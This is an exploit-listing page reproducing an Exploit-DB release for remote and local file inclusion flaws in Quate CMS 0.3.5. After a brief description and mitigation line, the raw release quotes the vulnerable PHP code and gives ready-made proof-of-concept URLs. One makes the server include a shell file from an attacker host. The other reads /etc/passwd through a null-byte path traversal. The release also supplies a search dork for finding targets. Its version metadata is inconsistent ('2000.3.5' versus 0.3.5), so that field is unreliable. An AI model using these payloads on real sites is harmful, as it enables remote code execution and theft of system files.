Quate CMS - exploit.company

vendor:

Quate CMS

by:

cr4wl3r

9.3

CVSS

HIGH

Remote File Inclusion (RFI) and Local File Inclusion (LFI)

CWE

Product Name: Quate CMS

Affected Version From: 2000.3.5

Affected Version To: 2000.3.5

Patch Exists: YES

Related CWE: N/A

CPE: a:quate_cms:quate_cms:0.3.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability

Quate CMS version 0.3.5 is vulnerable to Remote File Inclusion (RFI) and Local File Inclusion (LFI) attacks. The vulnerability exists in the admin/includes/header.php and admin/includes/footer.php files. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The malicious request can include a URL to a malicious file hosted on a remote server, which will be included in the vulnerable page. This can allow an attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Upgrade to the latest version of Quate CMS. Additionally, ensure that all user input is properly sanitized and validated.

Source

Exploit-DB raw data:

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]



########################################################################

#Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability

#Download Script      :  http://quate.net/quatecms

#Dork                 :  die("lamers attempt");  :P

########################################################################

#

#Vuln RFI : ./QuateCMS_035/admin/includes/header.php (line 27)

#       <?php

#         if ($bypass_restrict != 1) {

#            require_once($secure_page_path. "includes/secure.php");

#         }

#       ?>

#PoC  :  http://[target]/[path]/admin/includes/header.php?secure_page_path=http://[attacker]/shell.txt???

#

#

#########################################################################

#

#Vuln LFI : ./QuateCMS_035/admin/includes/footer.php (line 4)

#       <?PHP

#           if ($not_logged_in != 1) {

#             if (file_exists("includes/themes/" .$row_secure['account_theme']. "/footer.php")) {

#              require_once("themes/" .$row_secure['account_theme']. "/footer.php");

#        ?>

#PoC   :  http://[target]/[path]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../etc/passwd%00

#

########################################################################

########################################################################

####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################

########################################################################

########################################################################



   [ Gorontalo / 2009 ]